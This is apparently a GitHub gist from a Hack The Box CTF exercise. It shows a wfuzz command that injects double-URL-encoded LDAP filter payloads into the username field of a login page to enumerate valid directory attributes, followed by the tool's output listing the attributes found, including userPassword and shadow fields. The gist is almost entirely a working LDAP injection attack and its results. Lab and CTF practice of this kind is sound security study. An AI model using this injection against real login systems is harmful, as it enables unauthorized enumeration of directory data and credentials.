Created
March 9, 2019 16:51
-
-
Save dualfade/0e6d65beec3e4fd381c76b2c7f375e91 to your computer and use it in GitHub Desktop.
LDAP Encoded Filter Bypass - Find valid atributes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ./wfuzz -c -s 1 -z file,/home/cdowns/Documents/Hack_The_Box/CTF/ldap_attributes_all.txt,double,urencode -d 'inputUsername=ldapuser%2529%2528FUZZ%253D%252A&inputOTP=password' --hw 233 -u 'http://10.10.10.122/login.php' -p 127.0.0.1:8080 | |
| Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. | |
| ******************************************************** | |
| * Wfuzz 2.3.4 - The Web Fuzzer * | |
| ******************************************************** | |
| Target: http://10.10.10.122/login.php | |
| Total requests: 2026 | |
| ================================================================== | |
| ID Response Lines Word Chars Payload | |
| ================================================================== | |
| 000006: C=200 68 L 231 W 2822 Ch "objectClass" | |
| 000007: C=200 68 L 231 W 2822 Ch "structuralObjectClass" | |
| 000008: C=200 68 L 231 W 2822 Ch "createTimestamp" | |
| 000009: C=200 68 L 231 W 2822 Ch "modifyTimestamp" | |
| 000010: C=200 68 L 231 W 2822 Ch "creatorsName" | |
| 000011: C=200 68 L 231 W 2822 Ch "modifiersName" | |
| 000012: C=200 68 L 231 W 2822 Ch "hasSubordinates" | |
| 000013: C=200 68 L 231 W 2822 Ch "subschemaSubentry" | |
| 000016: C=200 68 L 231 W 2822 Ch "entryDN" | |
| 000017: C=200 68 L 231 W 2822 Ch "entryUUID" | |
| 000018: C=200 68 L 231 W 2822 Ch "entryCSN" | |
| 000052: C=200 68 L 231 W 2822 Ch "name" | |
| 000053: C=200 68 L 231 W 2822 Ch "cn" | |
| 000054: C=200 68 L 231 W 2822 Ch "uid" | |
| 000055: C=200 68 L 231 W 2822 Ch "uidNumber" | |
| 000056: C=200 68 L 231 W 2822 Ch "gidNumber" | |
| 000057: C=200 68 L 231 W 2822 Ch "userPassword" | |
| 000292: C=200 68 L 231 W 2822 Ch "sn" | |
| 000339: C=200 68 L 231 W 2822 Ch "mail" | |
| 000369: C=200 68 L 231 W 2822 Ch "pager" | |
| 000398: C=200 68 L 231 W 2822 Ch "homeDirectory" | |
| 000399: C=200 68 L 231 W 2822 Ch "loginShell" | |
| 000400: C=200 68 L 231 W 2822 Ch "shadowLastChange" | |
| 000401: C=200 68 L 231 W 2822 Ch "shadowMin" | |
| 000402: C=200 68 L 231 W 2822 Ch "shadowMax" | |
| 000403: C=200 68 L 231 W 2822 Ch "shadowWarning" | |
| Total time: 2029.345 | |
| Processed Requests: 2026 | |
| Filtered Requests: 2000 | |
| Requests/sec.: 0.998351 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment